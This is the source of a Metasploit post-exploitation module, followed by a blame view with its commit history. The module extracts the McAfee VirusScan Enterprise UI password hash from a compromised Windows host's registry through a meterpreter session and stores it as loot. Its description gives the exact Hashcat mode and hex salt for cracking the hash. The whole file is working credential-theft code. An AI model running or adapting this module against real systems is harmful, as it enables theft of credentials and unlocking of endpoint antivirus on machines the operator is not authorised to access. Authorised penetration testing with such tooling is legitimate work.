metasploit-framework/modules/post/windows/gather/credentials/mcafee_vse_hashdump.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles

  VERSION_5 = Gem::Version.new('5.0')
  VERSION_6 = Gem::Version.new('6.0')
  VERSION_8 = Gem::Version.new('8.0')
  VERSION_9 = Gem::Version.new('9.0')

  def initialize(info = {})
    super(update_info(
      info,
      'Name'          => 'McAfee Virus Scan Enterprise Password Hashes Dump',
      'Description'   => %q(
        This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)
        used to lock down the user interface. Hashcat supports cracking this type of
        hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt
        (--hex-salt) of 01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic
        format is available for John the Ripper at the referenced URL.
      ),
      'License'       => MSF_LICENSE,
      'Author'        => [
        'Mike Manzotti <mike.manzotti[at]dionach.com>', # Metasploit module
        'Maurizio inode Agazzini' # original research
      ],
      'References'    => [
        ['URL', 'https://www.dionach.com/blog/disabling-mcafee-on-access-scanning']
      ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ]
    ))
  end

  def run
    print_status("Looking for McAfee VSE password hashes on #{sysinfo['Computer']} ...")

    vse_keys = enum_vse_keys
    if vse_keys.empty?
      vprint_error("McAfee VSE not installed or insufficient permissions")
      return
    end

    hashes_and_versions = extract_hashes_and_versions(vse_keys)
    if hashes_and_versions.empty?
      vprint_error("No McAfee VSE hashes extracted")
      return
    end
    process_hashes_and_versions(hashes_and_versions)
  end

  def enum_vse_keys
    vprint_status('Enumerating McAfee VSE installations')
    keys = []
    [
      'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit
      'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit
    ].each do |key|
      subkeys = registry_enumkeys(key)
      keys << key unless subkeys.nil?
    end
    keys
  end

  def extract_hashes_and_versions(keys)
    vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")
    hash_map =  {}
    keys.each do |key|
      hash = registry_getvaldata(key, "UIPEx")
      if hash.empty?
        vprint_error("No McAfee VSE password hash found in #{key}")
        next
      end

      version = registry_getvaldata(key, "szProductVer")
      if version.empty?
        vprint_error("No McAfee VSE version key found in #{key}")
        next
      end
      hash_map[hash] = Gem::Version.new(version)
    end
    hash_map
  end

  def process_hashes_and_versions(hashes_and_versions)
    hashes_and_versions.each do |hash, version|
      if version >= VERSION_5 && version < VERSION_6
        hashtype = 'md5u'
        version_name = 'v5'
      else
        # Base64 decode hash
        hash =  Rex::Text.to_hex(Rex::Text.decode_base64(hash), "")
        hashtype = 'dynamic_1405'
        version_name = 'v8'
        unless version >= VERSION_8 && version < VERSION_9
          print_warning("Unknown McAfee VSE version #{version} - Assuming v8")
        end
      end

      print_good("McAfee VSE #{version_name} (#{hashtype}) password hash: #{hash}")

      credential_data = {
        post_reference_name: refname,
        origin_type: :session,
        private_type: :nonreplayable_hash,
        private_data: hash,
        session_id: session_db_id,
        jtr_format: hashtype,
        workspace_id: myworkspace_id
      }

      create_credential(credential_data)

      # Store McAfee password hash as loot
      loot_path = store_loot('mcafee.hash', 'text/plain', session, "mcafee:#{hash}", 'mcafee_hashdump.txt', 'McAfee Password Hash')
      print_status("McAfee VSE password hash saved in: #{loot_path}")
    end
  end
end
Add McAfee Hashdump 2015-01-02 10:22:11 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Post`
			`include Msf::Post::Windows::Registry`
			`include Msf::Auxiliary::Report`
			`include Msf::Post::Windows::UserProfiles`

More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`VERSION_5 = Gem::Version.new('5.0')`
			`VERSION_6 = Gem::Version.new('6.0')`
			`VERSION_8 = Gem::Version.new('8.0')`
			`VERSION_9 = Gem::Version.new('9.0')`

Cleanup style 2015-01-09 19:00:25 +00:00			`def initialize(info = {})`
			`super(update_info(`
			`info,`
			`'Name' => 'McAfee Virus Scan Enterprise Password Hashes Dump',`
			`'Description' => %q(`
Update mcafee_vse_hashdump description The description of this module has been added upon to include cracking details. 2015-04-16 20:09:43 +00:00			`This module extracts the password hash from McAfee Virus Scan Enterprise (VSE)`
Update mcafee_vse_hashdump.rb 2015-04-17 13:47:02 +00:00			`used to lock down the user interface. Hashcat supports cracking this type of`
			`hash using hash type sha1($salt.unicode($pass)) (-m 140) and a hex salt`
			`(--hex-salt) of 01000f000d003300 (unicode "\x01\x0f\x0d\x33"). A dynamic`
Update mcafee_vse_hashdump description The description of this module has been added upon to include cracking details. 2015-04-16 20:09:43 +00:00			`format is available for John the Ripper at the referenced URL.`
Cleanup style 2015-01-09 19:00:25 +00:00			`),`
			`'License' => MSF_LICENSE,`
			`'Author' => [`
Fix https://github.com/m7x/metasploit-framework/pull/1#issuecomment-69454590 2015-01-10 14:15:53 +00:00			`'Mike Manzotti <mike.manzotti[at]dionach.com>', # Metasploit module`
			`'Maurizio inode Agazzini' # original research`
			`],`
			`'References' => [`
			`['URL', 'https://www.dionach.com/blog/disabling-mcafee-on-access-scanning']`
Cleanup style 2015-01-09 19:00:25 +00:00			`],`
			`'Platform' => [ 'win' ],`
			`'SessionTypes' => [ 'meterpreter' ]`
			`))`
			`end`
Add McAfee Hashdump 2015-01-02 10:22:11 +00:00
Move run method 2015-01-14 23:54:02 +00:00			`def run`
Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`print_status("Looking for McAfee VSE password hashes on #{sysinfo['Computer']} ...")`
Move run method 2015-01-14 23:54:02 +00:00
			`vse_keys = enum_vse_keys`
			`if vse_keys.empty?`
Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`vprint_error("McAfee VSE not installed or insufficient permissions")`
Move run method 2015-01-14 23:54:02 +00:00			`return`
			`end`

			`hashes_and_versions = extract_hashes_and_versions(vse_keys)`
			`if hashes_and_versions.empty?`
Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`vprint_error("No McAfee VSE hashes extracted")`
Move run method 2015-01-14 23:54:02 +00:00			`return`
			`end`
			`process_hashes_and_versions(hashes_and_versions)`
			`end`

Cleanup style 2015-01-09 19:00:25 +00:00			`def enum_vse_keys`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`vprint_status('Enumerating McAfee VSE installations')`
			`keys = []`
Cleanup style 2015-01-09 19:00:25 +00:00			`[`
			`'HKLM\\Software\\Wow6432Node\\McAfee\\DesktopProtection', # 64-bit`
			`'HKLM\\Software\\McAfee\\DesktopProtection' # 32-bit`
			`].each do \|key\|`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`subkeys = registry_enumkeys(key)`
Fix https://github.com/m7x/metasploit-framework/pull/1#issuecomment-69454590 2015-01-10 14:15:53 +00:00			`keys << key unless subkeys.nil?`
Cleanup style 2015-01-09 19:00:25 +00:00			`end`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`keys`
Add McAfee Hashdump 2015-01-02 10:22:11 +00:00			`end`

More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`def extract_hashes_and_versions(keys)`
			`vprint_status("Attempting to extract hashes from #{keys.size} McAfee VSE installations")`
			`hash_map = {}`
Cleanup style 2015-01-09 19:00:25 +00:00			`keys.each do \|key\|`
			`hash = registry_getvaldata(key, "UIPEx")`
			`if hash.empty?`
Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`vprint_error("No McAfee VSE password hash found in #{key}")`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`next`
Add McAfee Hashdump 2015-01-02 10:22:11 +00:00			`end`
Cleanup style 2015-01-09 19:00:25 +00:00
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`version = registry_getvaldata(key, "szProductVer")`
			`if version.empty?`
Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`vprint_error("No McAfee VSE version key found in #{key}")`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`next`
			`end`
			`hash_map[hash] = Gem::Version.new(version)`
			`end`
			`hash_map`
			`end`

			`def process_hashes_and_versions(hashes_and_versions)`
			`hashes_and_versions.each do \|hash, version\|`
Correct McAfee credential storage, prepare for store_loot 2015-01-16 20:10:01 +00:00			`if version >= VERSION_5 && version < VERSION_6`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`hashtype = 'md5u'`
Correct McAfee credential storage, prepare for store_loot 2015-01-16 20:10:01 +00:00			`version_name = 'v5'`
Cleanup style 2015-01-09 19:00:25 +00:00			`else`
Correct McAfee credential storage, prepare for store_loot 2015-01-16 20:10:01 +00:00			`# Base64 decode hash`
			`hash = Rex::Text.to_hex(Rex::Text.decode_base64(hash), "")`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`hashtype = 'dynamic_1405'`
Correct McAfee credential storage, prepare for store_loot 2015-01-16 20:10:01 +00:00			`version_name = 'v8'`
Minor ruby style cleanup 2015-01-22 04:27:38 +00:00			`unless version >= VERSION_8 && version < VERSION_9`
Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`print_warning("Unknown McAfee VSE version #{version} - Assuming v8")`
Correct McAfee credential storage, prepare for store_loot 2015-01-16 20:10:01 +00:00			`end`
Cleanup style 2015-01-09 19:00:25 +00:00			`end`

Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`print_good("McAfee VSE #{version_name} (#{hashtype}) password hash: #{hash}")`
Cleanup style 2015-01-09 19:00:25 +00:00
Add McAfee Hashdump 2015-01-02 10:22:11 +00:00			`credential_data = {`
Cleanup style 2015-01-09 19:00:25 +00:00			`post_reference_name: refname,`
			`origin_type: :session,`
Correct McAfee credential storage, prepare for store_loot 2015-01-16 20:10:01 +00:00			`private_type: :nonreplayable_hash,`
More cleanup Handle multiple versions Better print_ Actually extract 2015-01-10 02:01:17 +00:00			`private_data: hash,`
Cleanup style 2015-01-09 19:00:25 +00:00			`session_id: session_db_id,`
			`jtr_format: hashtype,`
Minor ruby style cleanup 2015-01-22 04:27:38 +00:00			`workspace_id: myworkspace_id`
Cleanup style 2015-01-09 19:00:25 +00:00			`}`

Correct McAfee credential storage, prepare for store_loot 2015-01-16 20:10:01 +00:00			`create_credential(credential_data)`
Add McAfee Hashdump 2015-01-02 10:22:11 +00:00
Store password hash as loot 2015-01-17 14:17:41 +00:00			`# Store McAfee password hash as loot`
Minor ruby style cleanup 2015-01-22 04:27:38 +00:00			`loot_path = store_loot('mcafee.hash', 'text/plain', session, "mcafee:#{hash}", 'mcafee_hashdump.txt', 'McAfee Password Hash')`
Tighten up prints to make it specific to VSE, not McAfee in general 2015-01-22 04:33:54 +00:00			`print_status("McAfee VSE password hash saved in: #{loot_path}")`
Cleanup style 2015-01-09 19:00:25 +00:00			`end`
			`end`
Add McAfee Hashdump 2015-01-02 10:22:11 +00:00			`end`